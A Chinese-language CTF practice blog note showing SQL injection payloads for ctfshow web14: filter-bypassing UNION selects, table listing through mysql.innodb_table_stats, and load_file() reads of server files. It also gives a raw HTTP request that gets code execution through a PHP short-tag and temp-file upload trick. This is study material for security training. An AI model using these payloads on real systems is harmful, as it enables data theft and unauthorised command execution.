note-23

ctfshow_web14

一开始也试了传c,但是就试到2,然后以为是源码绕过的,看wp发现是sql注入。
再试到3就能自己发现这个页面了,,,,,,,,
/here_1s_your_f1ag.php
按f12发现:

if(preg_match(‘/information_schema.tables|information_schema.columns|linestring| |polygon/is’, $_GET[‘query’])){
die(‘@A@’);

禁用了information_schema猜是无列名注入

1
2
3
1'union/**/select/**/database()

1&&sleep(5)

字符注入

1
2
3
1&&order/**/by/**/1

0/**/union/**/select/**/database()

试出是字符注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0/**/union/**/select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database()

0/**/union/**/select/**/@@version

//alert('10.2.26-MariaDB-log')

0/**/union/**/select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats
//alert('gtid_slave_pos,content')

0/**/union/**/select/**/group_concat(*)/**/from/**/gtid_slave_pos

0/**/union/**/select/**/group_concat(1,2,3)/**/from/**/content

0/**/union/**/select/**/*/**/from/**/content

0/**/union/**/select/**/load_file/**/

试一下无列名注入

1
2
3
4
5
6
7
0/**/union/**/select/**/group_concat(1,2,3)/**/from/**/(select/**/1,2,3/**/from/**/content)

0/**/select/**/1,2,3/**/union/**/select/**/*/**/from/**/content#

0/**/union/**/select/**/group_concat(1,2,3)/**/from/**/content

//回显(123,123,123,123)无果

看wp:https://blog.csdn.net/m0_55923820/article/details/118783171
原来sql还能加载文件
学到了

1
2
3
4
5
6
7
8
9
0/**/union/**/select/**/load_file('/var/www/html/secret.php')

0/**/union/**/select/**/load_file('/tmp/gtf1y')

0/**/union/**/select/**/load_file('/tmp/gtf1y/real_flag_is_here')

0/**/union/**/select/**/load_file('/real_flag_is_here')
//没想到是直接访问'/real_flag_is_here'
//alert('ctfshow{dd04abdc-9d55-4d0d-8d2d-f616f7b82caa}')

有无列明注入的版本wp,但我在我的环境没试出来:
https://www.zxcms.com/content/3fcqbuf331l6p0.html

ctfshow 红包题第二弹

这题有点牛逼了

https://www.cnblogs.com/wssw/p/18115718
前面的?>意思是闭合前面的语句。
<?=是echo()的别名用法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /?cmd=?%3E%3C?=`.%20/??p/p?p??????`; HTTP/1.1
Host: 6fd1fc97-dca5-4a94-8065-2622d4c7ed8d.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------114514
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: UM_distinctid=1739f845e394-0cffbf96840b0c8-4c302d7c-144000-1739f845e3b4e2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 245

-----------------------------114514
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/bash

cat /flag.txt
-----------------------------114514--
#刷题note
note-23
https://aidemofashi.github.io/2025/04/10/note-23/
作者
aidemofashi
发布于
2025年4月10日
许可协议